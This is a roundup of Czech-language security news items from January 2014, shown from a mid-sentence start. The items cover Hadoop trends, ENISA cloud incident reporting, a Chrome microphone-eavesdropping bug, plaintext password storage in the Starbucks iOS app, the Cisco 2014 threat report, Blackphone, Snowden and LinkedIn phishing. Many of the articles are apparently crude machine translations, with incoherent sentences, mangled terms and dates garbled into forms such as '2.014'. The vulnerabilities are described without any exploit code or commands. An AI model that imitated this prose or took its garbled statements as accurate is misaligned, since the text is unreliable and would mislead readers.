propadnutí věci, tvrdit, že je vlastníkem Bitcoins nalézt na jeho počítačového hardwaru, a zpochybňuje propadnutí těchto Bitcoins.
Hlavní vývoj, který bude řídit velkých objemů dat v roce 2014
27.1.2014 Bezpečnost
Firmy jsou nuceny odhalit skutečnou hodnotu svých dat, a oni obracejí na Hadoop jako klíčovou součást svého datového centra strategie. V roce 2014, bude datová centra odklon od zkušebních rozmístění Hadoop a do plné výroby.
CEO a spoluzakladatel MapR Technologies, John Schroeder předpovídá, že několik hlavních trendů dojde v roce 2014, které budou mít vliv jak firmy ukládat, zpracovávat, analyzovat a sdílet Big Data. Patří mezi ně: SQL současně se stává největší slib a zklamáním pro Big dat. vývoj SQL pro Hadoop umožňuje obchodní analytici využít své schopnosti a SQL nástroje výběru pro projekty velkých objemů dat. Ale řešení SQL, které vyžadují před definuje datovou strukturu a centrální ruční správu, dochází ke zpožděním a rozsah dopadu. Cílem je umožnit důvtipný analytici SQL snadný přístup k strukturovaných a nestrukturovaných dat v škálovatelnou platformu Hadoop, není-li znovu vytvořit kolo, které existuje v prostředí datových skladů. Tyto 3 nejlepší obavy o bezpečnost v roce 2014: ověřování, ověřování, ověřování. S Nápor schopností v Hadoop dostupných kontroly přístupu, organizace, rychle si uvědomil, že ověřování úroveň žíla je požadovaný základ. S 2014 přichází poznání, že chyby dat jsou "vede k optimalizaci." Není to kvalita dat, ale datové chyby, které zabírají organizací v roce 2014 . Ještě chyby údaje naznačují problémy s podkladových zdrojových systémů? Jsou chyby datové výsledkem problémů, ETL, které se zavádějí předsudky v navazujícím analýzy? Ještě chyby údaje naznačují, definiční rozdíly nebo nedostatek konzistence napříč odděleními a obchodními segmenty? 2014 bude vidět všeobjímající datových anomálií. Vznik provozní Hadoop. 2.014 uvidíte dramatický nárůst výrobních rozmístění Hadoop ze strany podniků ve všech odvětvích. Takové nasazení odhalí sílu Hadoop při operacích, kde výrobní aplikace a analýzy poskytují měřitelný obchodní výhodu. Většina datových skladů prostředí bude implementovat datového rozbočovač podniku. 2.014 uvidí většinu společností, které nasazují Hadoop složit zpracování ETL a data z podnikových dat sklady na Hadoop působí jako centrální podnikové rozbočovač, který je desetkrát levnější a lze provádět další analýzy pro další zpracování nebo nových aplikací. Každý lídr nasadí nové datové orientovanou aplikaci, nebo nebudou vést k dlouho. Schopnost páky Big dat se objeví jako konkurenční zbraň v roce 2014, jak stále více firem bude používat Big Data a Hadoop určit preference jednotlivých spotřebitelů pro ziskový upsell a příležitostí cross-sell, lepší zmírnění rizika a snížení výroby a režijních nákladů. poznání, že údaje je centrum datového centra. roce 2014 organizací bude přechod od vývojářů jízdních iniciativy velkých objemů dat a stále za úkol se definuje datovou infrastrukturu potřebnou pro podporu různých aplikací a zaměřit se na infrastrukturu potřebné pro zavedení, proces a chránit organizace základní aktivum. Hledat jeví jako nestrukturovaných Query Language. V roce 2013 jsme viděli velké množství SQL iniciativ pro Hadoop, 2014 bude rokem, že "nestrukturované dotazovací jazyk", tj. hledání, přichází do plné pozornosti.
Jak implementovat vykazování v cloud computingu incidentu
27.1.2014 IT | Bezpečnost
Bezpečnostní incidenty Cloud často přitahují pozornost médií, jelikož mohou ovlivnit velký počet uživatelů. Například, v poslední době velký poskytovatel skladovací služby utrpěl výpadek trvající dva dny. Nicméně, vzhledem k nedostatku konzistentních režimů podávání zpráv, pokud jde o cloud bezpečnostních incidentů, je těžké pochopit příčiny a dopad těchto incidentů.
Chcete-li pochopit, odolnost a bezpečnost služeb cloud computingu lépe, je důležité, aby diskutovali o tématu s průmyslem a vládou a najít společnou řeč, pokud jde o podávání zpráv schémata pragmatický událost, která by poskytla užitečné informace pro zákazníky a vládními orgány. Výkonný ředitel ENISA, profesor Udo Helmbrecht poznamenal: "Hlášení incidentů je velmi důležité pro lepší pochopení bezpečnosti a odolnosti evropských kritických informačních infrastruktur Cloud computing se nyní stává páteří naší digitální společnosti, a proto je důležité, aby poskytovatelé cloud zlepšit transparentnost a důvěru. . přijetím zpráv schémata efektivní incidentu " Nová zpráva se zaměřuje na čtyři různé cloud computing scénářů a zkoumá, jak by mohl být program hlášení incidentů nastavení, zapojení poskytovatelů cloud, cloud zákazníky, provozovatelů kritických infrastruktur a orgány státní správy: A. Cloud služby používá kritické informační infrastruktury operátora B. Cloud služby zákazníků používá v mnoha důležitých odvětvích C. Cloud služby pro státní a veřejné správy (gov-cloud) D. . Cloud služby využívány malými a středními podniky a občany pomocí dotazníků a rozhovorů s odborníky, jsme identifikovali několik klíčových otázek:
Ve většině členských států EU, neexistuje žádný vnitrostátní orgán posoudit kritičnost cloudových služeb.
Cloud služby jsou často založeny na jiných cloudových služeb. Tím se zvyšuje složitost a komplikuje hlášení incidentů.
Zákazníci Cloud často nedávejte povinnosti hlášení incidentů v jejich smlouvách cloud služeb.
Zpráva obsahuje několik doporučení, na základě zpětné vazby od mraků odborníků v průmyslu a vládě:
Dobrovolné systémy podávání zpráv téměř neexistuje a je třeba provést právní předpisy pro obsluhu v kritických odvětvích, k podávání zpráv o bezpečnostních incidentech.
Státní orgány by se měly zaměřit povinnosti hlášení incidentů ve svých požadavcích při zadávání veřejných zakázek.
Provozovatelé kritické sektoru by se měla zabývat hlášení o incidentu v jejich smlouvách.
Systémy hlášení incidentů může poskytnout "win-win" pro poskytovatele a zákazníky, zvýšit transparentnost a tímto způsobem podporovat důvěru.
Poskytovatelé by měli vést cestu a nastavit efektivní a účinné, dobrovolné systémy podávání zpráv.
Chrome umožňuje odposlouchávání uživatelů
27.1.2014 Ochrana
Vývojář objevil v internetovém prohlížeči zranitelnost, kterou lze využít k odposlouchávání dění v okolí počítače.
Izraelský kóder Tal Ater na chybu narazil při vývoji vlastního softwaru pro rozpoznávání lidské řeči.
Přestože Google přišel na způsob, jakým lze chybu snadno opravit, již v říjnu loňského roku, opravnou aktualizaci podle Atera dosud nevydal. Podle Googlu se tak nestalo, protože chyba nepředstavovala pro uživatele vážnou hrozbu.
„I když zrovna nejste u počítače, celá vaše konverzace a všechny vaše telefonní hovory mohou být nahrávány a zneužity,“ napsal ve svém blogovém příspěvku Ater.
Chyba se prý objeví ve chvíli, kdy se škodlivá webová stránka pokusí změnit způsob, jakým Chrome pracuje s rozpoznáváním řeči.
Běžná praxe v Chromu je taková, že uživatelé musejí udělit ruční potvrzení každé webové stránce, která žádá o přístup k jejich mikrofonu. Po udělení povolení pak Chrome uživatele na každé používání mikrofonu upozorní blikající červenou tečkou v záložce daného webu.
Ve videu přiloženém k článku Ater názorně ukazuje, jak mohou útočníci pomocí speciálního kódu zneužít udělená povolení ke spuštění skrytého okna, které aktivuje systém pro rozpoznávání řeči.
„Škodlivé stránky, které jste jednou navštívili, pak mohou v odposlouchávání pokračovat i poté, co z nich odejdete. Dokud neukončíte samotný Chrome, nemůžete si být svým soukromím jisti,“ napsal Ater.
Google byl podle Atera o chybě informován již loni v říjnu a velmi brzy přišel na způsob, jak ji odstranit. V aktualizacích se však oprava zatím neobjevila.
Ater se proto Googlu na důvody odkladu opravy přímo zeptal. Ten mu řekl, že čeká na vyjádření organizace W3C, která určuje směr, jakým se web vyvíjí.
„Bezpečnost našich uživatelů má pro nás nejvyšší prioritu a při vývoji této funkce bylo dbáno na bezpečnost a soukromí,“ uvedl zástupce společnosti. Chybu prý stále prověřuje i přesto, že pro uživatele podle jeho názoru nepředstavuje žádnou hrozbu, protože uživatel musí každé stránce dát již zmíněné povolení.
Symantec se snaží patentu technologie nanášení škodlivé torrenty
26.1.2014 Viry
V myslích většiny lidí, koncept torrentů je obecně spojován s pirátského obsahu. Přes toto, každý by měl vědět, že BitTorrent je přenos souborů / sdílení protokol, který lze použít pro právní, tak i pro nelegální činnosti. zbraní a popularita torrent stránek neprošel bez povšimnutí počítačoví podvodníci, kteří se domnívají, je skvělý způsob, jak distribuovat malware a vést uživatele k podvodům. "Každý den tisíce" falešných "bystřin jsou nahrané před škodlivými zdrojů, často označené jmény populárních filmů a televizních pořadů," TorrentFreak poukazuje . "Netřeba říkat, že ti, kdo si stáhnout tyto torrenty nedostanou to, co hledali." To je nemožné říci, zda torrent je škodlivý, nebo ne jen tím, že při pohledu na název souboru, ale Symantec věří, že mají dobré řešení pro nanášení špatné jablka. řešení, pro které společnost podala patent, spoléhá na důvěryhodné informace spojené s vrstevníky, tracker, původní nahrál, apod. Technologie je stanovena na odhalení alespoň jednoho subjektu podílejícího se na torrenty transakce (snad více), a na analýzu jeho (jejich) důvěryhodnost.
Na základě tohoto hodnocení, řešení, určuje, zda soubor torrent představuje riziko pro uživatele, a umožňuje uživateli, aby si vybral, co dělat s těmito informacemi, tedy to, co "bezpečnostní opatření", aby se. "Příklady takových bezpečnostních opatření zahrnují, aniž by omezení, upozorní uživatele na potenciální bezpečnostní rizika, blokuje přístup k cílovému souboru, dokud zrušen uživatelem, blokování síťového provozu spojené s torrent transakce, do karantény cílový soubor, a / nebo odstranění cílového souboru, "společnost je vysvětleno v patentová přihláška . Pochybuji, že systém je spolehlivý, ale zdá se, že to může pomoci zmírnit problém škodlivých torrentů.
Nová technologie vyhledávání zašifrované údaje ve své zašifrované podobě
26.1.2014 Ochrana
Fujitsu Laboratories oznámila, že vývoj technologií, které lze provádět skryté prohledávání šifrovaných dat ve své zašifrované podobě.
Vyhledávání dat a zároveň je šifrována umožňuje udržovat vysokou úroveň soukromí bez rizika netěsnosti -. Zvlášť důležité pro osobní údaje, jako je DNA, medicínská data, biologických dat a vzdělávací záznamů Prostřednictvím outsourcingu, mohou prohlídky důvěrných údajů, bude provádět bezpečně jako textová data a klíčových podmínky vyhledávání soukromý. Zda nebo ne hledat hity jsou získávány také zůstává utajený. homomorfní na šifrování, které umožňuje výpočty, které mají být provedeny na důvěrných šifrovaných dat bez vyzrazení základě Fujitsu vyvinula nový dávkový způsob vyhledávání, který zrychluje rychlost zpracování hledáním zápasy na šifrovaným datům . Nová technologie může vyhledávat 16.000 znaků v jedné vteřině, a nepotřebuje index lze vyhledávat klíčová slova, které mají být vytvořené v předstihu. Místo toho, to dělá diskreční vyhledávání na šifrovaném textu přímo pro jakýkoli vyhledávací klíč. Existuje již řada metod pro vyhledávání dat v šifrovaném stavu, ale to se spoléhat na pre-registraci vyhledávat klíčová slova, a neumožňují netradičnímu vyhledávání. Tyto prohlídky setkat s určitými problémy při provádění, jakož. Jako výsledky vyhledávání jsou nešifrovaná, což vytváří potenciál pro nechtěné zveřejnění na vyhledávače. Kromě toho, hledání proces je časově náročný. Fujitsu Laboratories vyvinula technologii, která může vyhledávat šifrované řetězce znaků v jejich šifrované stavu. Tato metoda je založena na homomorfní šifrování, které umožňuje provádět statistické výpočty na šifrované řetězce znaků, ale bere tuto myšlenku ještě o krok dále tím, že vykonává více šifrované výpočtů v jediném procesu, pracuje v dávkovém režimu určit, zda hledání klíče se zobrazí v charakter řetězci právě prohledávat. Vzhledem k povaze homomorfní šifrování, prohledávatelné klíčová slova nemusí být registrovány v předstihu, takže data zůstanou tajemstvím v průběhu procesu hledání, které může vykrýt 16.000 znaků za sekundu. Vlastnosti této technologie jsou následující. 1. Vyhledávání šifrované řetězce znaků přímo na zápasy, což eliminuje potřebu předregistrace klíčová slova Fujitsu Laboratories vyvinula technologii, která odpovídá zašifrovaný text pomocí rozšíření k soukromým výpočetních funkcí v homomorfní šifrování. Vzhledem k tomu, že proces hledání shody mezi vyhledávacího klíče a šifrované řetězce znaků se provádí při znakový řetězec je šifrována, není potřeba lze vyhledávat klíčová slova, které mají být registrovány v předstihu. Také použití homomorfní šifrování znamená, že celý proces hledání se provádí za použití šifrované řetězce znaků. Dokonce i výsledky vyhledávání jsou šifrována, takže mohou být přečteny pouze někdo s dešifrovací klíč, dále zvyšovat bezpečnost. 2. Výpočty Batch-mode urychlit proces vyhledávání Minulé metody vyhledávání mohly vyhledávat pouze pro znakové řetězce jeden řetězec najednou. Fujitsu Laboratories vyvinula způsob, jak prohledávat celý znak řetězce v dávkovém režimu, což má za následek výrazně rychlejší zpracování. Tato metoda umožňuje vyhledávat 16.000 znaků znakových řetězců během jedné sekundy nebo méně. Results Tato technologie umožňuje vyhledávat šifrovaných dat pro každou arbitrary vyhledávacím klíči, při zachování nejen zdrojový samotná data encrypted, ale také vyhledávací klíč, a dokonce i výsledky hledání. Při aplikaci na hledání určité sekvence bází v řetězci DNA, například, tato technologie umožňuje DNA informaci člověka zůstat soukromé, zatímco zjištění, zda obsahuje určitou posloupnost. To také umožňuje dosáhnout nové analytické výsledky získané z lékařských záznamů nebo sekvencí bází získaných z různých nemocnic, to vše při šifrována, který má potenciál, aby se vývoj nových léků účinnější. Dokonce i data, která má obzvláště citlivé důsledky ochraně osobních údajů, jako je například lékařské záznamy, lze nyní vyhledávat v plném rozsahu, díky této technologii. Tato technologie má potenciální využití mimo biologii a medicíně, stejně, jako je například shromažďování výsledků z různých vzdělávacích institucí pro analýzu. To by mohlo být použito v různých situacích, kdy Ochrana osobních údajů musí být chráněna, nebo kde byl problém ochrany dat. Budoucí plány Fujitsu Laboratories pokračuje s praktickým testováním této technologie, s cílem komerčního zavedení v roce 2015. Záměrem společnosti je, aby tato technologie široce používán jako způsob, jak udržet bezpečnost osobních informací, ve světě, který je stále více tažen dat, a jako nástroj pro vytváření přínos pro společnost tím, že údaje více užitečné a zároveň chránit soukromí.
Microsoft rozšiřuje podporu pro řešení zabezpečení Win XP, aby v polovině-2015
26.1.2014 Zranitelnosti | Bezpečnost
Navzdory tomu, že oznámil začátkem tohoto měsíce, že by přestala poskytovat aktualizace signatur pro Security Essentials pro Windows XP v 08.04.2014 - stejné datum, kdy systém Windows XP dosáhne konce své životnosti a podporu - Microsoft udělal o otáčky a rozhodl se pokračovat poskytnout aktualizace svého antimalware podpisy a motorem pro uživatele Windows XP prostřednictvím 14.července 2015.
"To nemá vliv na koncové-of-Support datum Windows XP nebo supportability Windows XP pro jiné produkty společnosti Microsoft, které poskytují, a uplatňovat tyto podpisy", které je vysvětleno v blogu. "Pro podnikové zákazníky, to platí i pro System Center Endpoint Protection, Forefront Client Security, Forefront Endpoint Protection a Windows Intune v systému Windows XP. Pro spotřebitele to platí pro Microsoft Security Essentials. " Rozhodnutí bylo pravděpodobně ovlivněno, že některé 30 procent uživatelů se ještě přepnout na novější verze Windows, a zdá se, že nejsou ve spěchu, přestože Microsoft, co byl velmi hlasitý o plánovaném skončení lhůty pro jeden z jejich nejpopulárnější verzí operačních systémů podpory. "Náš výzkum ukazuje, že účinnost antimalware řešení ven -of-podpora operačních systémů je omezená, "varují, ačkoli. "Spuštění dobře chráněné řešení začíná s využitím moderního software a hardware určený k ochraně proti dnešním hrozeb." Další důležitou věcí je, aby zvážila, že výzkumníci bezpečnostní předpovídají , že počet aktivních kampaní, které používají Windows XP využije budou stupňovat. Pokud trváte o použití starého OS, musíte být vědomi toho, že i když bezpečnostní řešení Microsoft stále přijímat nové podpisy, to neznamená, že jste v bezpečí. Když byste zvážit přechod na jednom z novějších verzí, zde je seznam alternativních AV řešení, které lze použít v mezidobí.
Explozivní růst pokročilých útoků a škodlivého provozu
26.1.2014 Počítačový útok | Hacking
Výroční zpráva Bezpečnostní Cisco 2014, dnes zveřejnila, ukazuje, že hrozby, jejichž účelem je využít důvěry uživatelů v systémech, aplikacích a osobních sítí dosáhly překvapivé úrovně. Podle zprávy, celosvětový nedostatek téměř milion kvalifikovaných odborníků zabezpečení je vliv schopnosti organizací pro sledování a bezpečné sítě, zatímco celkové zranitelnosti a hrozby dosáhly nejvyšší úrovně od roku 2000.
Zjištění ve zprávě nabízejí živý obraz rychle se vyvíjejících bezpečnostních výzev, kterým čelí podniky, IT oddělení a jednotlivců. Metody útočník patří sociálně inženýrství krádežím hesel a přihlašovacích údajů, skrývají-in-plain-pohled infiltrace a využívání důvěry potřebné pro ekonomické transakce, vládních služeb a sociálních interakcí. Zpráva uvádí nedostatek více než milion bezpečnostních profesionálů po celém zeměkoule v roce 2014. Propracovanost technologie a taktiky používané pro on-line zločinci-a jejich nonstop pokusy porušení sítí a krást data, které předčilo schopnost IT a bezpečnostních profesionálů k řešení těchto hrozeb. Většina organizací nemají lidé nebo systémy, které průběžně sledovat rozšířen sítě a detekci infiltrace, a pak použít ochranu, včas a účinným způsobem. Sto procent vzorku 30 největších světových nadnárodních podnikových sítí generované návštěvník návštěvnost webových stránek, které obsahují malware. Devadesát šest procent sítí přezkoumat sděleny provoz na unesených servery. Podobně 92 procent přenášeny návštěvnost webových stránek bez obsahu, který se obvykle hostit škodlivou činnost. DDoS útoky , které narušují provoz do az cílených internetových stránek a může paralyzovat ISP, jak v objemu a závažnosti se zvýšily. Některé DDoS útoky se snaží ukrýt před jinou zločinnou činnost, například podvodu drátu, během nebo po hlučném a rozptylující DDoS kampaně. Víceúčelové trojské koně počítá jako nejčastěji setkal web-doručena malware, 27 procent z celkových setkání v roce 2013. Škodlivé skripty, jako je využije a iframe, tvořil druhou nejčastěji setkali kategorii na 23 procent. krádeži dat trojské koně, jako jsou hesla zloděje a zadní vrátka tvořily 22 procent celkových web malware setkání. Stabilní pokles v jedinečné malware hostitele a IP adres-dolů 30 procent mezi lednem 2013 a zářím 2013, naznačuje, že malware je soustředěna v méně hostitelů a méně IP adres. Java nadále nejčastěji využíván programovací jazyk terčem on-line zločinci. Data z Sourcefire, nyní součástí Cisco, vyplývá, že Java využije tvoří převážnou většinu (91 procent) z ukazatelů kompromisu (IOCs). Devadesát devět procent všech mobilních malware cílových zařízení se systémem Android. Na 43,8 procenta, Andr / Qdplugin-byl nejčastěji setkali mobilní malware, obvykle prostřednictvím přeměněných kopie legitimních aplikací distribuovaných prostřednictvím neoficiálních tržištích. Specifické sektory, jako je farmaceutický a chemický průmysl a elektroniky zpracovatelského průmyslu, historicky Měl vysoké malware ceny setkat. V roce 2012 a 2013, tam byl významný nárůst malwaru setkání pro zemědělství a těžebního průmyslu, dříve sektoru relativně nízké riziko. Malware setkání také pokračoval růst v odvětví energetiky, ropy a zemního plynu. John N. Stewart, senior vice president, ČSÚ, Threat Response inteligence a rozvoj, Cisco, řekl: "I když Výroční zpráva Bezpečnostní Cisco maluje ponurý obraz proudu stav kybernetické bezpečnosti, existuje naděje na obnovení důvěry u lidí, institucí a technologií - a to začíná posílení obránce s real-svět znalosti o rozšíření útok povrchy. Chcete-li opravdu chránit proti všem těmto možným útokům, musí obránci pochopit útočníky, jejich motivace a jejich metody - před, během a po útoku "
Kvantová fyzika by mohla bezpečný, na jedno použití počítačové paměti možné
26.1.2014 Bezpečnost
Systémy Počítačová bezpečnost jednoho dne může získat podporu z kvantové fyziky, v důsledku nedávného výzkumu z Národního institutu pro standardy a technologie (NIST). Počítačový vědec Yi-Kai Liu navrhl pryč, aby se bezpečnostní zařízení, které se ukázalo být velmi těžké stavět, je "one-shot", paměťovou jednotku, jejíž obsah lze číst jen jednou.
Výzkum ukazuje, teoreticky, jak zákony kvantové fyziky by mohlo pro výstavbu těchto paměťových zařízení. Jednorázové vzpomínky bude mít široký rozsah možných aplikací, jako je ochrana převod velké částky peněz v elektronické podobě. jeden-shot paměť může obsahovat dva autorizační kódy: jeden, že úvěry bankovní účet příjemce, a jeden, že úvěry bankovní účet odesílatele v případě, že přenos se zruší. Důležité je, že paměti by mohl být čten pouze jednou, takže pouze jeden z kódů, jsou vyvolány, a tedy pouze jeden z těchto dvou akcí je provádět ne obojí. "V případě, že útočník má fyzickou kontrolu zařízení, jako je ukradené sám mobilní telefon, software obrana nestačí, musíme použít odolných proti násilnému otevření hardware pro zajištění bezpečnosti, "říká Liu. "Kromě toho, k ochraně kritických systémů, nechceme se příliš spoléhat na komplexní obrany, které by mohly ještě dostat pirát. Je to lepší, když se můžeme spolehnout na základních přírodních zákonů, které jsou nenapadnutelná." Bohužel, není tam žádný zásadní řešení k problému budování odolných proti násilnému otevření čipy, alespoň ne pomocí klasické fyziky sám. Takže vědci snažili zapojit kvantovou mechaniku dobře, protože informace, které jsou kódovány do kvantového systému se chová odlišně od klasického systému. Liu zkoumá jeden přístup, který ukládá data pomocí kvantových bitů, nebo "qubits", které využívají kvantové vlastnosti, jako je magnetický spin reprezentovat digitální informace. Pomocí techniky označované jako "konjugát kódování," dvě tajné zprávy,-jako jsou například oddělené autorizačních kódů, může být zakódován do stejného řetězce qubits, takže uživatel může získat buď jeden ze dvou zpráv. Ale jak qubits lze číst pouze jednou, uživatel nemůže získat obojí. Riziko tohoto přístupu vychází z jemnější kvantový jev: "zapletení", kde dvě částice se mohou vzájemně ovlivňovat, i když odděleny velké vzdálenosti. Pokud protivník je možné používat zapletení, může získat obě zprávy najednou, prolomení zabezpečení systému. Nicméně, Liu zjistil, že v některých druzích fyzikálních systémů, je velmi obtížné vytvořit a používat zapletení, a ukazuje jeho práce, že tato překážka se vyklube výhoda: Liu představuje matematický důkaz, že pokud protivník nemůže použít zapletení v jeho útoku, že protivník nebude nikdy moci získat obě zprávy z qubits. Proto, pokud jsou použity správné fyzikální systémy, metody kódování konjugát je přeci v bezpečí. "Je to fascinující, jak z toho, je klíčem k tomu, aby tuto práci zamotání a nedostatek," říká Liu. "Z praktického hlediska je tato kvantová zařízení by bylo dražší pro výrobu, ale oni by poskytují vyšší úroveň bezpečnosti. Právě teď, je to stále základní výzkum. Ale tam bylo hodně pokroku v této oblasti, a tak jsem "jsem optimista, že to povede ke užitečných technologií v reálném světě."
Starbucks iOS app ukládá hesla ve formátu prostého textu
26.1.2014 Mobil | Zranitelnosti
Bezpečnostní výzkumník zjistil, že se pokusil Starbuck iOS Mobilní aplikace ukládá Uživatelé "uživatelská jména, e-mailové adresy a hesla ve formátu prostého textu, a sdílet tento objev se společností měsíců. Nicméně, poté, co opakovaně byly převedeny na zákaznický servis, Daniel Wood rozhodl jít na veřejnost s jeho objevem na Full Disclosure konferenci v pondělí. "Uživatelské jméno, e-mailovou adresu a heslo prvky jsou uloženy ve formátu prostého textu-v session.clslog Crashlytics log soubor, "vysvětlil. "V session.clslog existuje více instancí skladování prostého textu pověření, které mohou být navrácena, a spekulativní za neoprávněné použití několika uživatelů účtu na vlastním zařízení uživatele se zlými úmysly ", nebo on-line na https://www.starbucks.com/ účet / signin . Obsahuje HTML stránky mobilních aplikací, který vykonává účet login nebo vynulování účtu. session.clslog také obsahuje OAuth tokenu (podepsal s HMAC-SHA1) a podpis protokolu OAuth pro uživatele účet / zařízení do provozu Starbucks . " Nebezpečí spočívá především v tom, že aplikace se používá k provedení nákupu na Starbuck, a někteří uživatelé povolit možnost automatického doplňování, což umožňuje aplikace přístup k bankovnímu účtu uživatelů a převést peníze z něj jejich Starbucks účet. zloděj, který krade uživatele iPhone nebo přítele, který ji půjčí, a ví, co má dělat a jaký nástroj použít můžete snadno získat přístup k výše uvedené souboru, i když je telefon zamknutý, řekl Wood Evan Schuman . Díky kombinaci uživatelského jména / hesla, může se vyprázdnit Starbucks účet oběti buď přes aplikaci (pokud se hádá PIN), nebo prostřednictvím webové stránky Starbucks. Dalším, může vážnější problém nastat v případě, že oběť používá stejné přihlašovací údaje pro více důležitých účtů . Vzhledem k tomu, veřejné vydání informací o této bezpečnostní chyby, Starbucks manažeři potvrdili, že věděli o jeho existenci, a že se zavedly odpovídající bezpečnostní opatření pro vyřešení chybu. Neměli určit, jaký druh opatření zavedených, ale Wood říká, že chyba je stále přítomen v nejnovější verzi aplikace. Tentokrát si také všiml, že soubor s historií Geolocation obsahuje také informace ve formátu prostého textu -. Informace, které mohou být použity k objevovat pohyby oběti Ve svém příspěvku na Plný seznam Disclosure, Dřevo, nabídl radu o tom, jak zmírnit tento problém, a má také sdílený seznam iOS konkrétních osvědčených postupů, pokud jde o ukládání dat, která app vývojáři měli realizovat. Ale jen čas může říct, jestli Starbucks bude naslouchat.
Blackphone dát první soukromí a kontrolu
26.1.2014 Mobil
Silent Circle a Geeksphone oznámil Blackphone, na soukromí smartphone umístění a ovládání přímo v rukou svých uživatelů.
Blackphone, poháněn bude zaměřen na bezpečnost Android sestavení s názvem PrivatOS, je dopravce a prodejce-nezávislé smartphone dává jednotlivcům a organizacím možnost volat a přijímat bezpečné telefonování, bezpečné výměny textů, přenos a ukládání souborů, a video chat bez kompromisů . soukromí uživatele na zařízení je vyvrcholením hodnotě několika kariéry "úsilí z hlavních postav v průmyslu, včetně Phil Zimmermann, tvůrce PGP; Javiera Aguera, spoluzakladatel Geeksphone; Jon Callas, spoluzakladatel PGP Inc . a CTO Silent Circle, Rodrigo Silva-Ramos, spoluzakladatel Geeksphone;., a Mike Janke, generální ředitel společnosti Silent Circle a bývalého amerického námořnictva SEAL "Strávil jsem celou svou kariéru usilovat o zahájení bezpečných telefonní přístroje," řekl Zimmermann. "Blackphone poskytuje uživatelům vše, co potřebují k zajištění soukromí a kontrolu nad jejich komunikací, spolu se všemi ostatními funkcemi high-end smartphone, co očekávají.
Snowden: V USA nemám šanci na spravedlivý proces
25.1.2014 IT
Bývalý spolupracovník americké Národní bezpečnostní agentury (NSA) pochybuje o tom, že by se mu v případě návratu do USA dostalo spravedlivého soudního procesu.
V současné době proto Edward Snowden možnost návratu do své rodné země vylučuje. 100 let starý zákon, z jehož porušení je v USA obviněn, prý nezná pojem „obrana veřejného zájmu“.
„Můj návrat domů a případná obhajoba přímo u soudu tedy nepřipadá v úvahu,“ napsal Snowden, který se stále nachází kdesi v Rusku, kde dostal dočasný azyl poté, co zveřejnil informace o obřím sledovacím programu amerických tajných služeb.
„Návrat do USA by byl podle mého názoru tím nejlepším řešením pro vládu, veřejnost i pro mě samotného. Vzhledem ke špatným zákonům na ochranu whistleblowerů, které se nevztahují na spolupracovníky s národními bezpečnostními složkami, to však není možné,“ vyjádřil se pro web Free Snowden.
K návratu by se prý rozhodl v případě, že by Kongres učinil kroky potřebné k ukončení sledovacího programu. Současně by se musel změnit zmiňovaný zákon na ochranu whistleblowerů a každý americký občan by tak měl právo na spravedlivý proces bez ohledu na to, pro koho pracuje.
V prosinci Snowden poslal do televizní stanice Channel 4 TV speciální vánoční zdravici, ve které vyzval k ukončení masového sledování lidí. V souvislosti s tím ho ve čtvrtek jistě potěšilo rozhodnutí nezávislé americké agentury PCLOB, že převážná část dat, která NSA získala odposloucháváním telefonních hovorů, byla pořízena nelegálně a měla minimálně přínos k boji proti terorismu. Agentura doporučila sledovací program zcela ukončit.
Ve čtvrtek se k případu Snowden rovněž vyjádřil americký generální prokurátor Eric Holder, který označil za nepravděpodobné, že by Edward Snowden mohl získat milost. Šlo by prý o tom uvažovat pouze v případě, že by přijal odpovědnost za uniklá státní tajemství.
Jaké antiviry ochrání počítač nejlépe
24.1.2014 Analýzy
Antivirových programů je na trhu nepřeberné množství. Jejich schopnosti a dovednosti pravidelně testují bezpečnostní experti z nezávislé organizace AV Comparatives. Ti nyní sestavili přehled těch nejlepších řešení. Vycházeli přitom z programů, které si uživatelé mohli v průběhu minulého roku na své počítače nainstalovat.
Nejlepším antivirovým programem loňského roku, který získal cenu „Product of the year“, je Kaspersky Internet Security. Ten vyšel jako vítěz po zhodnocení všech testovaných kategorií. Na hodnocení se tak podepsala nejenom schopnost odstraňovat nejrůznější škůdce, ale také například to, jak antivirový program zatěžuje celý systém.
Antivirová společnost Kaspersky Lab prvenství získala také v kategorii Real-World Protection, kde se během dlouhodobých testů hodnotí také schopnosti jednotlivých antivirů chránit operační systém před nezvanými návštěvníky.
V této kategorii, která se obecně považuje za jednu z nejdůležitějších, druhé místo patří programu Emsisoft Anti-Malware. Z výsledků se mohou radovat i Češi. Třetí příčku totiž obsadil Avast! Free Antivirus, který na konci 80. let vytvořili dva čeští počítačoví nadšenci Eduard Kučera a Pavel Baudiš. O třetí příčku se zároveň s Avastem dělí také slovenská společnost Eset se svým řešením Smart Security.
Samozřejmě ani vítěz testu, ani ostatní antiviry neochrání počítač vždy na 100 %. Zadní vrátka do operačního systému totiž často otevírají nejrůznějším škůdcům samotní uživatelé svým neuváženým jednáním.
Phishing přes sociální média
24.1.2014 Phishing
Používání sociálních médií jako útočný vektor není nic nového, jsme všichni viděli spoustu příběhů v médiích falešných profilů FaceBook, jako ten pro americký admirál James Stavridis již v roce 2012 [1]. To inklinuje znamenat, že jsme více opatrní Facebook a Twitter, ale mnozí z nás i nadále používat LinkedIn, jak je to skvělý nástroj pro budování z profesních sítí, klepněte na na podobně smýšlející skupiny, nebo být pronásledován osloven zaměstnavateli.
Je-li žádost LinkedIn pochází z názvu poznáte, že ne slepě s výjimkou požadavku nebo udělat trochu vyšetřování nejprve k ověření, že žádost? Řekněme, že jste opatrní, bezpečnost smýšlející typ a kontrola profilu odesílatele a vypadá to legitimní, Vsadím se, že většina z nás by pak přijímat žádosti a dostat se na náš den.
Posledních pár Deníky Napsal jsem byl o narušení a jedním z klíčových prvků každé dobré útoku je solidní průzkum. Protivník s jasným pochopením zaměstnanců společnosti může využít, že dostat mnohem úplnější obraz než jakékoli skenování portů nebo pin-bod klíčových lidských cílů, které využívají. Spousta penetračních testerů [2] využívat sociální média k zničujícím účinkem, a tak dělat skutečné protivníky.
Někteří z vás čtete tento bude myslet:
) Pah! Nechci používat formu sociálních médií, takže jsem v bezpečí
B) Meh, bych nikdy nepadne za nic z toho vylomeniny, jsem příliš paranoidní / security-minded
C) Mu-ha-ha! Já používám Lynx textový prohlížeč, [3] - co je to široký wide web mluvíte pryč?
No, jak se o osoby vedle vás nebo vedoucího představitele nebo generálního ředitele? Tento blog post [4] ukazuje velmi inteligentní, dobře promyšlené a popraven sociálního inženýrství útoku pomocí LinkedIn. LinkedIn má velmi citlivý bezpečnostní tým a tady je jeden způsob, jak upozornit než falešných profilů [5] byste měli v minulosti spustili v jedné, ale bude většina lidí vyzvednout na falešný profil?
Nechám vás s touto otázkou: Jak by se vy a vaše bezpečnostní politiky proti cílený útok, jako že proti senior členem představenstva?
